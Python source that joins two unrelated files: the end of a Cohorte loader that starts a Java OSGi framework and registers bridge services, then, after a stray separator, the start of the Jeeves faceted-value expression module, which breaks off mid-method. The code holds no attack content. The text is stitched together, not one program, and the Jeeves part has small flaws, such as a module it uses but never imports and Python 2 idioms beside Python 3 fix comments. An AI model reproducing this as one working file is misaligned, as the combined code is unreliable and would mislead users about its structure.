    def prepareIsolate(self, uid, name, node, kind, level, sublevel,
                       bundles, composition):
        """
        Prepares the configuration dictionary of an isolate

        :return: The isolate configuration converted for Java, or None on
                 error
        """
        try:
            conf = self._parser.prepare_isolate(
                uid, name, node, kind, level, sublevel, bundles, composition)
        except Exception:
            # Was a bare "except:" -- narrowed so that SystemExit and
            # KeyboardInterrupt are no longer swallowed
            _logger.exception("Error preparing isolate...")
            return None

        return self._to_java(conf)

    def readConfiguration(self, filename):
        """
        Reads the given configuration file

        :param filename: A configuration file name
        :return: The parsed configuration map
        """
        # Load the file
        raw_dict = self._parser.read(filename)
        # Convert the dictionary to Java
        return self._to_java(raw_dict)
# ------------------------------------------------------------------------------
class EventFactory(object):
    """
    Implementation of org.cohorte.herald.eventapi.IEventFactory
    """
    JAVA_INTERFACE = HERALD_EVENT_FACTORY_INTERFACE

    def __init__(self, java_svc):
        """
        Sets up members

        :param java_svc: Java runner service, used to create Java proxies
        """
        self._java = java_svc

    def createEvent(self):
        """
        Creates an event for the Java world
        """
        proxy = EventProxy()
        return self._java.make_proxy(proxy)

    def sleep(self, milliseconds):
        """
        Sleeps the given number of milliseconds
        """
        seconds = milliseconds / 1000.
        time.sleep(seconds)

    def toString(self):
        """
        Java toString() method
        """
        return "Python Event Factory for Herald"
class EventProxy(object):
    """
    Implementation of org.cohorte.herald.eventapi.IEvent
    """
    JAVA_INTERFACE = HERALD_EVENT_INTERFACE

    def __init__(self):
        """
        Sets up members
        """
        event = threading.Event()
        self.__event = event
        # Expose the underlying Event methods under their Java-style names
        self.clear = event.clear
        self.isSet = event.isSet
        self.set = event.set

    def waitEvent(self, timeout_ms=None):
        """
        Proxy to call the wait() method of the event

        :param timeout_ms: Maximum wait time in milliseconds; None or a
                           negative value means "wait forever"
        """
        if timeout_ms is not None and timeout_ms >= 0:
            return self.__event.wait(timeout_ms / 1000.)
        return self.__event.wait()

    def toString(self):
        """
        Java toString() method
        """
        return "Python EventProxy for Herald"
# ------------------------------------------------------------------------------
@ComponentFactory(ISOLATE_LOADER_FACTORY)
@Provides(cohorte.SERVICE_ISOLATE_LOADER)
@Property('_handled_kind', cohorte.SVCPROP_ISOLATE_LOADER_KIND, LOADER_KIND)
@Requires('_java', cohorte.SERVICE_JAVA_RUNNER)
@Requires('_repository', cohorte.repositories.SERVICE_REPOSITORY_ARTIFACTS,
          spec_filter="({0}=java)"
          .format(cohorte.repositories.PROP_REPOSITORY_LANGUAGE))
@Requires('_config', cohorte.SERVICE_CONFIGURATION_READER)
@Requires('_finder', cohorte.SERVICE_FILE_FINDER)
class JavaOsgiLoader(object):
    """
    Pelix isolate loader. Needs a configuration to be given as a parameter of
    the load() method.
    """
    def __init__(self):
        """
        Sets up members
        """
        # Injected services
        self._java = None
        self._config = None
        self._finder = None
        self._repository = None
        # Pelix bundle context
        self._context = None
        # OSGi Framework
        self._osgi = None
        # Bridge service registrations (PyBridge and Herald EventFactory)
        self._bridge_reg = None
        self._herald_reg = None

    @staticmethod
    def _setup_vm_properties(properties):
        """
        Sets up the JVM system properties dictionary (not the arguments)

        :param properties: Configured properties
        :return: VM properties dictionary
        """
        # Prepare the dictionary (copy, so the configuration isn't mutated)
        return properties.copy() if properties else {}

    def _setup_osgi_properties(self, properties, allow_bridge,
                               extra_packages=None):
        """
        Sets up the OSGi framework properties and converts them into a Java
        HashMap.

        :param properties: Configured framework properties
        :param allow_bridge: If True, the bridge API package will be exported
                             by the framework.
        :param extra_packages: Extra system packages declaration extracted
                               from the JVM arguments, if any
        :return: The framework properties as a Java Map
        """
        osgi_properties = self._java.load_class("java.util.HashMap")()
        for key, value in properties.items():
            if value is not None:
                osgi_properties.put(key, str(value))

        # Inherit some Pelix properties
        for key in (cohorte.PROP_HOME, cohorte.PROP_BASE,
                    cohorte.PROP_UID, cohorte.PROP_NAME,
                    cohorte.PROP_NODE_UID, cohorte.PROP_NODE_NAME,
                    cohorte.PROP_NODE_DATA_DIR,
                    cohorte.PROP_DUMPER_PORT,
                    cohorte.PROP_FORKER_HTTP_PORT,
                    herald.FWPROP_PEER_UID, herald.FWPROP_PEER_NAME,
                    herald.FWPROP_NODE_UID, herald.FWPROP_NODE_NAME,
                    herald.FWPROP_APPLICATION_ID):
            value = self._context.get_property(key)
            if value is not None:
                # Avoid empty values
                osgi_properties.put(key, str(value))

        # Special case: Herald groups (comma-separated list)
        value = self._context.get_property(herald.FWPROP_PEER_GROUPS)
        if value:
            osgi_properties.put(herald.FWPROP_PEER_GROUPS,
                                ','.join(str(group) for group in value))

        new_extra_packages = None
        if allow_bridge:
            # Prepare the "extra system package" framework property, exporting
            # the bridge and Herald Event API packages to the OSGi bundles
            if extra_packages:
                new_extra_packages = \
                    "{0}; version=1.0.0, {1}; version=1.0.0,{2}".format(
                        PYTHON_BRIDGE_BUNDLE_API, HERALD_EVENT_BUNDLE_API,
                        extra_packages)
            else:
                new_extra_packages = \
                    "{0}; version=1.0.0, {1}; version=1.0.0".format(
                        PYTHON_BRIDGE_BUNDLE_API, HERALD_EVENT_BUNDLE_API)
        else:
            if extra_packages:
                new_extra_packages = "{0}".format(extra_packages)

        if new_extra_packages:
            _logger.debug(
                "Framework extra-packages={0}".format(new_extra_packages))
            osgi_properties.put(
                FRAMEWORK_SYSTEMPACKAGES_EXTRA, new_extra_packages)
        else:
            _logger.debug("No extra-packages!")
        return osgi_properties

    def _start_jvm(self, vm_args, classpath, properties):
        """
        Starts the JVM, with the given file in the class path

        :param vm_args: JVM arguments
        :param classpath: A list of JAR files
        :param properties: Java system properties
        :raise KeyError: Error starting the JVM
        :raise ValueError: Invalid JAR file
        """
        # Start a JVM if necessary
        if not self._java.is_running():
            # Arguments given to the Java runner
            java_args = []
            if vm_args:
                # VM specific arguments first
                java_args.extend(vm_args)

            # DEBUG: Remote debug server
            # java_args.append("-Xdebug")
            # java_args.append("-Xrunjdwp:transport=dt_socket,"
            #                  "server=y,suspend=y,address=5005")

            # Set the class path as a parameter
            java_args.append(self._java.make_jvm_classpath(classpath))

            # Prepare the JVM properties definitions
            for key, value in self._setup_vm_properties(properties).items():
                java_args.append(self._java.make_jvm_property(key, value))
            self._java.start(None, *java_args)
        else:
            # JVM already running: just add the JARs to the class path
            for jar_file in classpath:
                self._java.add_jar(jar_file)

    def _close_osgi(self):
        """
        Stops the OSGi framework and clears all references to it
        """
        # Unregister services. A dedicated member is kept for the Herald
        # registration: it used to be stored in _bridge_reg and then
        # overwritten by the PyBridge registration, leaking the service.
        if self._bridge_reg is not None:
            self._bridge_reg.unregister()
            self._bridge_reg = None
        if self._herald_reg is not None:
            self._herald_reg.unregister()
            self._herald_reg = None

        # Stop the framework
        if self._osgi is not None:
            self._osgi.stop()
            self._osgi = None

    def _register_bridge(self, context, java_configuration):
        """
        Instantiates and registers the iPOJO components instantiation handler
        inside the OSGi framework

        :param context: An OSGi bundle context
        :param java_configuration: The Java boot configuration
        """
        # Make a Java proxy of the bridge
        bridge_java = self._java.make_proxy(
            PyBridge(self._context, self._java, java_configuration,
                     self._config, self._bridge_callback))

        # Register it to the framework
        self._bridge_reg = context.registerService(
            PyBridge.JAVA_INTERFACE, bridge_java, None)

    def _register_herald_bridge(self, context):
        """
        Registers the Herald EventFactory service inside the OSGi framework

        :param context: An OSGi bundle context
        """
        # Make a Java proxy of the Herald bridge
        herald_java = self._java.make_proxy(EventFactory(self._java))

        # Register it to the framework, with a high service ranking
        props = self._java.load_class("java.util.Hashtable")()
        props.put("service.ranking", 1000)
        # Keep the registration in its own member so it can be unregistered
        # (previously stored in _bridge_reg and clobbered later)
        self._herald_reg = context.registerService(
            EventFactory.JAVA_INTERFACE, herald_java, props)

    @staticmethod
    def _bridge_callback(success, message):
        """
        Called back by the Python-Java bridge

        :param success: If True, all components have been started, else an
                        error occurred
        :param message: A call back message
        """
        if success:
            _logger.debug("Bridge success: %s", message)
        else:
            _logger.warning("Bridge error: %s", message)

    def _find_osgi_jar(self, osgi_jar, symbolic_name):
        """
        Looks for the OSGi framework JAR file matching the given parameters

        :param osgi_jar: An OSGi framework JAR file name
        :param symbolic_name: An OSGi framework symbolic name
        :return: A (file name, framework factory) tuple
        :raise ValueError: No OSGi framework found
        """
        try:
            # We've been given a specific JAR file or symbolic name
            osgi_bundle = self._repository.get_artifact(symbolic_name,
                                                        filename=osgi_jar)
        except ValueError:
            # Bundle not found: fall back on any framework in the repository
            for bundle in self._repository.filter_services(FRAMEWORK_SERVICE):
                # Get the first found framework
                osgi_bundle = bundle
                break
            else:
                # for/else: the loop found no framework at all
                raise ValueError("No OSGi framework found in repository")

        # Found !
        return osgi_bundle.file, osgi_bundle.get_service(FRAMEWORK_SERVICE)

    def load(self, configuration):
        """
        Loads the Java OSGi isolate

        :param configuration: Isolate configuration dictionary (required)
        :raise KeyError: A mandatory property is missing
        :raise ValueError: Invalid parameter/file encountered or the JVM
                           can't be loaded
        :raise BundleException: Error installing a bundle
        :raise Exception: Error instantiating a component
        """
        if not configuration:
            raise KeyError("A configuration is required to load a "
                           "Java OSGi isolate")

        # Parse the configuration (boot-like part) -> Might raise error
        java_config = self._config.load_boot_dict(configuration)

        # Find the OSGi JAR file to use
        osgi_jar_file, factory_name = self._find_osgi_jar(
            configuration.get('osgi_jar'), configuration.get('osgi_name'))
        _logger.debug("Using OSGi JAR file: %s", osgi_jar_file)

        # Prepare the VM arguments
        classpath = [osgi_jar_file]

        # Find the bridge API JAR file
        api_jar = self._repository.get_artifact(PYTHON_BRIDGE_BUNDLE_API)
        if api_jar:
            # Add the bundle to the class path...
            classpath.append(api_jar.file)
        else:
            raise Exception("Python bridge API bundle is missing")

        # Find the Herald API JAR file
        herald_event_jar = self._repository.get_artifact(
            HERALD_EVENT_BUNDLE_API)
        if herald_event_jar:
            # Add the bundle to the class path...
            classpath.append(herald_event_jar.file)
        else:
            raise Exception("Herald Event API bundle is missing")

        # Start the JVM
        _logger.debug("Starting JVM...")
        self._start_jvm(configuration.get('vm_args'), classpath,
                        configuration.get('vm_properties'))

        # Patch for Mac OS X:
        # GUI library must be loaded early in the main thread
        if sys.platform == 'darwin':
            # We need this dark magic stuff for dummy OSes
            self._java.load_class("java.awt.Color")

        # Load the FrameworkFactory implementation
        _logger.debug("Loading OSGi FrameworkFactory: %s", factory_name)
        factory_class = self._java.load_class(factory_name)
        factory = factory_class()

        # Retrieve extra packages declared through the JVM arguments
        vm_args = configuration.get('vm_args')
        tmp = []
        if vm_args:
            tmp = [vm_arg for vm_arg in vm_args
                   if FRAMEWORK_SYSTEMPACKAGES_EXTRA in vm_arg]
        extra_packages = ""
        if len(tmp) > 0:
            # Split on the first '=' only: the packages value itself may
            # contain '=' (e.g. "some.pkg; version=1.0.0"), which a plain
            # split("=")[1] would truncate
            extra_packages = tmp[0].split("=", 1)[1]

        # Framework properties
        osgi_properties = self._setup_osgi_properties(java_config.properties,
                                                      api_jar is not None,
                                                      extra_packages)

        # Start a framework, with the given properties
        self._osgi = factory.newFramework(osgi_properties)
        self._osgi.start()
        context = self._osgi.getBundleContext()

        # Register the Herald Event API bridge
        self._register_herald_bridge(context)

        # Install bundles
        java_bundles = []

        # Install the bridge
        bundle = self._repository.get_artifact(PYTHON_BRIDGE_BUNDLE)
        if not bundle:
            _logger.warning("No Python bridge bundle found")
        else:
            _logger.debug("Installing PyBridge bundle: %s", bundle.url)
            java_bundles.append(context.installBundle(bundle.url))

        # Install the configured bundles
        for bundle_conf in java_config.bundles:
            bundle = self._repository.get_artifact(
                bundle_conf.name, bundle_conf.version, bundle_conf.filename)
            if not bundle:
                if not bundle_conf.optional:
                    raise ValueError("Bundle not found: {0}"
                                     .format(bundle_conf))
                else:
                    _logger.warning("Bundle not found: %s", bundle_conf)
            elif bundle.file == osgi_jar_file:
                _logger.debug("OSGi framework is already installed.")
            else:
                _logger.debug("Installing Java bundle %s (is_fragment=%s)...",
                              bundle.name, bundle.is_fragment())
                b = context.installBundle(bundle.url)
                # Fragments can only be installed, never started
                if not bundle.is_fragment():
                    java_bundles.append(b)

        try:
            # Start the bundles
            for bundle in java_bundles:
                _logger.debug("Starting %s...", bundle.getSymbolicName())
                bundle.start()
        except jpype.JavaException as ex:
            # Log the bundle exception and its cause
            _logger.error("Error starting bundle: %s",
                          ex.__javaobject__.toString())
            cause = ex.__javaobject__.getCause()
            while cause is not None:
                _logger.error("... caused by: %s", cause.toString())
                cause = cause.getCause()
            # Raise exception to the caller
            raise

        # Start the component instantiation handler
        # (once all bundles have been installed)
        self._register_bridge(context, java_config)

    def wait(self):
        """
        Waits for the isolate to stop
        """
        if not self._osgi:
            # Nothing to do
            return

        # Wait for the OSGi framework to stop
        try:
            self._osgi.waitForStop(0)
        except Exception as ex:
            _logger.exception("Error waiting for the OSGi framework "
                              "to stop: %s", ex)
            raise

    @Validate
    def validate(self, context):
        """
        Component validated

        :param context: The bundle context
        """
        # Update the finder
        self._finder.update_roots()
        # Store the framework access
        self._context = context

    @Invalidate
    def invalidate(self, context):
        """
        Component invalidated

        :param context: The bundle context
        """
        # Stop the framework
        self._close_osgi()
        # Clear the JVM
        self._java.stop()
        # Clear the framework access
        self._context = None
| |
''' This defines the abstract syntax tree for sensitive expressions.
'''
import operator
import z3
import JeevesLib
import traceback
import types
import env.VarEnv
import env.PolicyEnv
import env.PathVars
import env.WritePolicyEnv
import threading
from collections import defaultdict
def facetApply(f, opr):
  """Apply the unary operator opr to every leaf of the faceted value f,
  rebuilding the facet tree on the way back up.

  Falls through (returning None) for leaf types other than Constant and
  FObject, exactly like the original if/elif chain.
  """
  if isinstance(f, Facet):
    mapped_thn = facetApply(f.thn, opr)
    mapped_els = facetApply(f.els, opr)
    return create_facet(f.cond, mapped_thn, mapped_els)
  elif isinstance(f, Constant):
    return Constant(opr(f.v))
  elif isinstance(f, FObject):
    return FObject(opr(f.v))
def create_facet(cond, left, right):
  """Smart constructor for Facet: collapse the facet when both branches
  are equal Constants, or FObjects wrapping the identical object."""
  both_constants = isinstance(left, Constant) and isinstance(right, Constant)
  if both_constants and left.v == right.v:
    return left
  both_objects = isinstance(left, FObject) and isinstance(right, FObject)
  if both_objects and left.v is right.v:
    return left
  return Facet(cond, left, right)
def facetJoin(f0, f1, opr):
  """Joins two (possibly faceted) values with the binary operator ``opr``,
  distributing the operator over the facet trees of both arguments
  (left argument first)."""
  # NOTE(review): when f0 is not a Facet but f0.v is a bound method, this
  # branch still reads f0.thn / f0.els -- presumably only Facet-like values
  # carry a MethodType .v here; confirm Constant/FObject never wrap methods.
  if isinstance(f0, Facet) or isinstance(f0.v, types.MethodType):
    thn = facetJoin(f0.thn, f1, opr)
    els = facetJoin(f0.els, f1, opr)
    return create_facet(f0.cond, thn, els)
  elif isinstance(f1, Facet) or isinstance(f1.v, types.MethodType):
    thn = facetJoin(f0, f1.thn, opr)
    els = facetJoin(f0, f1.els, opr)
    return create_facet(f1.cond, thn, els)
  else:
    # NOTE(JY): Sometimes we still have an Expr in here if we can't yet
    # resolve it...
    return Constant(opr(f0.v, f1.v))
class JeevesState:
  """Per-thread global state for the Jeeves runtime.

  Environments, caches and the solver state are kept in dictionaries keyed
  by the current thread, so concurrent requests do not share symbolic
  state. ``init()`` must be called before the per-thread properties are
  used.
  """
  def __init__(self):
    pass

  def init(self):
    """Creates (or resets) all per-thread environments and counters."""
    # Cache of concretized values.
    self._concretecache = defaultdict(env.ConcreteCache.ConcreteCache)
    # Regular environments.
    self._varenv = defaultdict(env.VarEnv.VarEnv)
    self._pathenv = defaultdict(env.PathVars.PathVars)
    self._policyenv = defaultdict(env.PolicyEnv.PolicyEnv)
    self._writeenv = defaultdict(env.WritePolicyEnv.WritePolicyEnv)
    self._all_labels = defaultdict(dict)
    self._solverstate = defaultdict()
    # Logging.
    self._log_policies = False
    self._policy_log_filehandle = None
    self._num_concretize = 0
    self._num_labels = 0
    # self._num_policies = 0
    # Early concretization optimization.
    self._viewer = defaultdict(FNull)

  @property
  def concretecache(self):
    return self._concretecache[threading.current_thread()]

  @property
  def num_concretize(self):
    # Number of concretizations recorded since the last reset.
    return self._num_concretize

  @property
  def num_labels(self):
    # Total number of labels seen across recorded concretizations.
    return self._num_labels

  # @property
  # def num_policies(self):
  #   return self._num_policies

  def set_log_policies(self, filehandle):
    """Enables policy logging, writing statistics to *filehandle*."""
    self._log_policies = True
    self._policy_log_filehandle = filehandle

  def log_policies(self):
    """Writes cumulative concretization/label statistics to the log file."""
    f = self._policy_log_filehandle
    if self._log_policies and self._num_concretize > 0:
      f.write("***\n")
      f.write("Concretizations so far: " + \
        str(self._num_concretize) + "\n")
      f.write("Labels so far: " + str(self._num_labels) + "\n")
      f.write("Average labels: " + \
        str(self._num_labels / (self._num_concretize * 1.0)) + "\n")
      # f.write("Policies so far: " + str(self._num_policies) + "\n")
      # f.write("Average policies: " + \
      #   str(self._num_policies / (self._num_concretize * 1.0)) + "\n")
      f.write("***\n")
      f.write("\n")

  def log_counts(self, label_count):
    """Records one concretization involving *label_count* labels."""
    if self._log_policies:
      self._num_concretize += 1
      f = self._policy_log_filehandle
      assert(f != None)
      f.write("***\n")
      self._num_labels += label_count
      f.write("Labels: " + str(label_count) + "\n")
      f.write("***\n")

  def clear_policy_count(self):
    """Resets the logging counters."""
    self._num_concretize = 0
    self._num_labels = 0
    # self._num_policies = 0

  @property
  def varenv(self):
    return self._varenv[threading.current_thread()]

  @property
  def pathenv(self):
    return self._pathenv[threading.current_thread()]

  @property
  def policyenv(self):
    return self._policyenv[threading.current_thread()]

  @property
  def writeenv(self):
    return self._writeenv[threading.current_thread()]

  @property
  def all_labels(self):
    return self._all_labels[threading.current_thread()]

  @property
  def solverstate(self):
    # Was "self._solverstate.has_key(...)": dict.has_key() was removed in
    # Python 3; the "in" operator is the portable equivalent.
    if threading.current_thread() in self._solverstate:
      return self._solverstate[threading.current_thread()]
    else:
      return None

  def reset_solverstate(self, ctxt):
    """Creates a fresh solver state for the current thread."""
    self._solverstate[threading.current_thread()] = \
      env.PolicyEnv.SolverState(self.policyenv.policies, ctxt)

  def clear_solverstate(self):
    self._solverstate[threading.current_thread()] = None

  @property
  def viewer(self):
    return self._viewer[threading.current_thread()]

  def set_viewer(self, viewer):
    self._viewer[threading.current_thread()] = viewer

  def reset_viewer(self):
    self._viewer[threading.current_thread()] = FNull()
# Module-level singleton: all Jeeves runtime code shares this state object.
jeevesState = JeevesState()
'''
Sensitive expressions.
'''
class FExpr(object):
  """Abstract base class for symbolic (faceted) expression nodes.

  The operator overloads below build new AST nodes instead of computing
  concrete results; plain Python operands are wrapped with fexpr_cast.
  """
  def vars(self):
    # Set of Var nodes this expression depends on (subclass responsibility).
    return NotImplemented
  def eval(self, env):
    # Concrete value of this expression under the given variable environment.
    return NotImplemented
  def z3Node(self):
    # Translation of this expression into a Z3 AST node.
    return NotImplemented
  def getChildren(self):
    # Direct sub-expressions (used by prettyPrint and tree traversals).
    return NotImplemented
  # Return a version of yourself with the write-associated labels remapped to
  # point to the new policy in addition to the previous policies.
  def remapLabels(self, policy, writer):
    return NotImplemented
  def prettyPrint(self, indent=""):
    # Indented tree dump: node type name followed by its children.
    return "%s%s\n%s" % (indent, type(self).__name__,
      "\n".join(child.prettyPrint(indent + "  ")
        for child in self.getChildren()))
  '''
  Sensitive Boolean expressions.
  '''
  # NOTE: operators take (l, r) rather than (self, other); both spellings
  # are equivalent for Python's method protocol.
  def __eq__(l, r):
    return Eq(l, fexpr_cast(r))
  def __ne__(l, r):
    return Not(Eq(l, fexpr_cast(r)))
  # The & operator
  def __and__(l, r):
    return And(l, fexpr_cast(r))
  def __rand__(r, l):
    return And(fexpr_cast(l), r)
  # The | operator
  def __or__(l, r):
    return Or(l, fexpr_cast(r))
  def __ror__(r, l):
    return Or(fexpr_cast(l), r)
  '''
  Integer expressions.
  '''
  def __add__(l, r):
    return Add(l, fexpr_cast(r))
  def __radd__(r, l):
    return Add(fexpr_cast(l), r)
  def __sub__(l, r):
    return Sub(l, fexpr_cast(r))
  def __rsub__(r, l):
    return Sub(fexpr_cast(l), r)
  def __mul__(l, r):
    return Mult(l, fexpr_cast(r))
  def __rmul__(r, l):
    return Mult(fexpr_cast(l), r)
  # Python 2 division protocol (__div__); there is no __truediv__ here, so
  # this module targets Python 2 semantics.
  def __div__(l, r):
    return Div(l, fexpr_cast(r))
  def __rdiv__(r, l):
    return Div(fexpr_cast(l), r)
  def __mod__(l, r):
    return Mod(l, fexpr_cast(r))
  def __rmod__(r, l):
    return Mod(fexpr_cast(l), r)
  def __abs__(v):
    # Faceted absolute value: branches symbolically when v is sensitive.
    if isinstance(v, FExpr):
      return JeevesLib.jif(v > 0, lambda:v, lambda:0 - v)
    return abs(v)
  # TODO bitwise operations? do we care?
  def __lt__(l, r):
    return Lt(l, fexpr_cast(r))
  def __gt__(l, r):
    return Gt(l, fexpr_cast(r))
  def __le__(l, r):
    return LtE(l, fexpr_cast(r))
  def __ge__(l, r):
    return GtE(l, fexpr_cast(r))
class CannotEvalException(Exception):
  """Raised when a sensitive expression cannot be concretely evaluated,
  e.g. when a variable has no binding in the path environment."""
  pass
def get_var_by_name(var_name):
  """Return a fresh Var whose name is exactly *var_name*.

  Equivalent to creating a Var and overwriting its generated name: the
  class counter is still bumped once and the type stays bool.
  """
  return Var(name=var_name, uniquify=False)
class Var(FExpr):
  """A symbolic boolean variable (a Jeeves label).

  Each Var gets a process-unique name derived from a class-level counter;
  pass ``uniquify=False`` to use *name* verbatim.
  """
  counter = 0  # class-level counter used to generate unique names

  def __init__(self, name=None, uniquify=True):
    if name:
      if uniquify:
        self.name = "v%d_%s" % (Var.counter, name)
      else:
        self.name = name
    else:
      self.name = "v%d" % Var.counter
    self.type = bool
    Var.counter += 1

  def eval(self, env):
    """Looks this variable up in *env*; raises CannotEvalException when it
    has no binding in the path environment."""
    try:
      return env[self]
    except IndexError:
      # NOTE(review): assumes the environment raises IndexError for a
      # missing variable -- confirm against PathVars' lookup semantics.
      raise CannotEvalException("Variable %s is not in path environment" \
        % self)

  def remapLabels(self, policy, writer):
    # A bare variable carries no write labels; nothing to remap.
    return self

  def __str__(self):
    return self.name

  def vars(self):
    return {self}

  def z3Node(self):
    return z3.Bool(self.name)

  def getChildren(self):
    return []

  def partialEval(self, env=None, unassignedOkay=False):
    """Replaces this variable with a Constant when *env* binds its name,
    otherwise expands it into a Facet over itself.

    The default for *env* used to be a mutable ``{}``; using ``None`` as
    the sentinel avoids the shared-mutable-default pitfall while behaving
    identically (the dict was never mutated).
    """
    if env is None:
      env = {}
    if self.name in env:
      return Constant(env[self.name])
    else:
      return Facet(self, Constant(True), Constant(False))

  def prettyPrint(self, indent=""):
    return indent + self.name

  def __getstate__(self):
    # NOTE(review): pickles down to just the name; no matching __setstate__
    # is in view, so round-trip semantics should be confirmed.
    return self.name
# helper methods for faceted __setattr__
def get_objs_in_faceted_obj(f, d, env):
  """Collect, into dict *d* keyed by id(), every concrete object reachable
  through the faceted value *f* under the partial assignment *env*.

  Raises TypeError for leaves that are not FObject wrappers.
  """
  if isinstance(f, FObject):
    d[id(f.v)] = f.v
    return
  if not isinstance(f, Facet):
    raise TypeError("wow such error: attribute access for non-object type; %s"
        % f.__class__.__name__)
  cond_name = f.cond.name
  if cond_name in env:
    # The condition is decided: only one branch is reachable.
    branch = f.thn if env[cond_name] else f.els
    get_objs_in_faceted_obj(branch, d, env)
  else:
    # Undecided condition: both branches may be visible.
    get_objs_in_faceted_obj(f.thn, d, env)
    get_objs_in_faceted_obj(f.els, d, env)
def replace_obj_attributes(f, obj, oldvalue, newvalue, env):
  """Rebuild the faceted value *f*, substituting *newvalue* wherever a leaf
  wraps exactly *obj*, and *oldvalue* at every other leaf.

  Conditions decided by *env* are collapsed to the chosen branch.
  """
  if not isinstance(f, Facet):
    # Leaf: substitute only when this leaf wraps the target object itself.
    return newvalue if f.v is obj else oldvalue
  if f.cond.name in env:
    # Decided condition: recurse into the single reachable branch.
    taken = f.thn if env[f.cond.name] else f.els
    return replace_obj_attributes(taken, obj, oldvalue, newvalue, env)
  # Undecided condition: rebuild the facet with both branches rewritten.
  return Facet(f.cond,
      replace_obj_attributes(f.thn, obj, oldvalue, newvalue, env),
      replace_obj_attributes(f.els, obj, oldvalue, newvalue, env))
'''
Facets.
'''
class Facet(FExpr):
  """A faceted value <cond ? thn : els>: behaves as thn when the boolean
  label cond holds on the current path, and as els otherwise."""
  def __init__(self, cond, thn, els):
    assert isinstance(cond, Var)
    # Assigned through __dict__ because __setattr__ below is overloaded to
    # perform faceted attribute assignment.
    self.__dict__['cond'] = cond
    self.__dict__['thn'] = fexpr_cast(thn)
    self.__dict__['els'] = fexpr_cast(els)
    # Note (TJH): idiomatic python does lots of automatic casts to bools,
    # especially to check if an integer is nonzero, for instance. We might
    # want to consider casting
    if self.cond.type != bool:
      raise TypeError("Condition on Facet should be a bool but is type %s."
            % self.cond.type.__name__)
    # Note (TJH): Ordinary Python would of course allow these types to be
    # distinct, but that sounds pretty annoying to support on our end.
    # TODO: Unassigned makes things super-awkward, we need to figure that out.
    # For now, just ignore them.
    #if (self.thn.type != None and self.els.type != None and
    #    self.thn.type != self.els.type):
    #  raise TypeError("Condition on both sides of a Facet must have the "
    #          "same type, they are %s and %s."
    #          % (self.thn.type.__name__, self.els.type.__name__))
    # The branch types may disagree; prefer thn's type when it is set.
    self.__dict__['type'] = self.thn.type or self.els.type
  def eval(self, env):
    return self.thn.eval(env) if self.cond.eval(env) else self.els.eval(env)
  def vars(self):
    return self.cond.vars().union(self.thn.vars()).union(self.els.vars())
  def z3Node(self):
    return z3.If(self.cond.z3Node(), self.thn.z3Node(), self.els.z3Node())
  def getChildren(self):
    return [self.cond, self.thn, self.els]
  def remapLabels(self, policy, writer):
    # A bare-label condition gets the write policy attached directly; a
    # compound condition is remapped recursively.
    if isinstance(self.cond, Var):
      newCond = jeevesState.writeenv.addWritePolicy(
                  self.cond, policy, writer)
    else:
      newCond = self.cond.remapLabels(policy, writer)
    return Facet(newCond
      , self.thn.remapLabels(policy, writer)
      , self.els.remapLabels(policy, writer))
  def partialEval(self, env={}, unassignedOkay=False):
    if self.cond.name in env:
      return self.thn.partialEval(env, unassignedOkay) if env[self.cond.name] else self.els.partialEval(env, unassignedOkay)
    else:
      # Specialize each branch under the corresponding assumption on cond.
      true_env = dict(env)
      true_env[self.cond.name] = True
      false_env = dict(env)
      false_env[self.cond.name] = False
      return create_facet(self.cond, self.thn.partialEval(true_env, unassignedOkay),
        self.els.partialEval(false_env, unassignedOkay))
  def prettyPrint(self, indent=""):
    return "< " + self.cond.prettyPrint() + " ? " + self.thn.prettyPrint() + " : " + self.els.prettyPrint() + " >"
  def __str__(self):
    return self.prettyPrint()
  def __call__(self, *args, **kw):
    # Calling a faceted function calls whichever branch is live on each path.
    return JeevesLib.jif(self.cond,
      lambda:self.thn(*args, **kw), lambda:self.els(*args, **kw))
  # called whenever an attribute that does not exist is accessed
  def __getattr__(self, attribute):
    # If the current path already fixes cond, project to the live branch;
    # otherwise the attribute access itself is faceted.
    if JeevesLib.jeevesState.pathenv.hasPosVar(self.cond):
      return getattr(self.thn, attribute)
    elif JeevesLib.jeevesState.pathenv.hasNegVar(self.cond):
      return getattr(self.els, attribute)
    return Facet(self.cond,
      getattr(self.thn, attribute),
      getattr(self.els, attribute))
  def __setattr__(self, attribute, value):
    if attribute in self.__dict__:
      self.__dict__[attribute] = value
    else:
      # Faceted write: update the attribute on every concrete object
      # reachable in either branch, guarding the new value by this facet.
      env = jeevesState.pathenv.getEnv()
      value = fexpr_cast(value)
      objs = {}
      get_objs_in_faceted_obj(self, objs, env)
      for _, obj in objs.iteritems():
        if hasattr(obj, attribute):
          old_val = getattr(obj, attribute)
        else:
          old_val = Unassigned("attribute '%s'" % attribute)
        t = replace_obj_attributes(self, obj, old_val, value, env)
        setattr(obj, attribute, t)
  def __getitem__(self, attribute):
    if JeevesLib.jeevesState.pathenv.hasPosVar(self.cond):
      return self.thn[attribute]
    elif JeevesLib.jeevesState.pathenv.hasNegVar(self.cond):
      return self.els[attribute]
    return Facet(self.cond, self.thn[attribute], self.els[attribute])
  def __setitem__(self, attribute, value):
    # Faceted item write; mirrors __setattr__ above.
    env = jeevesState.pathenv.getEnv()
    value = fexpr_cast(value)
    objs = {}
    get_objs_in_faceted_obj(self, objs, env)
    for _, obj in objs.iteritems():
      t = replace_obj_attributes(self, obj, obj[attribute], value, env)
      obj[attribute] = t
  def __eq__(self, other):
    # Object-typed operands must be compared per-branch; primitives build a
    # symbolic comparison node instead.
    other = fexpr_cast(other)
    if self.type == object or other.type == object:
      return JeevesLib.jif(self.cond, lambda : self.thn == other,
        lambda : self.els == other)
    else:
      return Eq(self, other)
  def __ne__(self, other):
    other = fexpr_cast(other)
    if self.type == object or other.type == object:
      return JeevesLib.jif(self.cond, lambda : self.thn != other,
        lambda : self.els != other)
    else:
      return Not(Eq(self, other))
  def __lt__(self, other):
    other = fexpr_cast(other)
    if self.type == object or other.type == object:
      return JeevesLib.jif(self.cond, lambda : self.thn < other,
        lambda : self.els < other)
    else:
      return Lt(self, other)
  def __gt__(self, other):
    other = fexpr_cast(other)
    if self.type == object or other.type == object:
      return JeevesLib.jif(self.cond, lambda : self.thn > other,
        lambda : self.els > other)
    else:
      return Gt(self, other)
  def __le__(self, other):
    other = fexpr_cast(other)
    if self.type == object or other.type == object:
      return JeevesLib.jif(self.cond, lambda : self.thn <= other,
        lambda : self.els <= other)
    else:
      return LtE(self, other)
  def __ge__(self, other):
    other = fexpr_cast(other)
    if self.type == object or other.type == object:
      return JeevesLib.jif(self.cond, lambda : self.thn >= other,
        lambda : self.els >= other)
    else:
      return GtE(self, other)
  def __len__(self):
    if self.type == object:
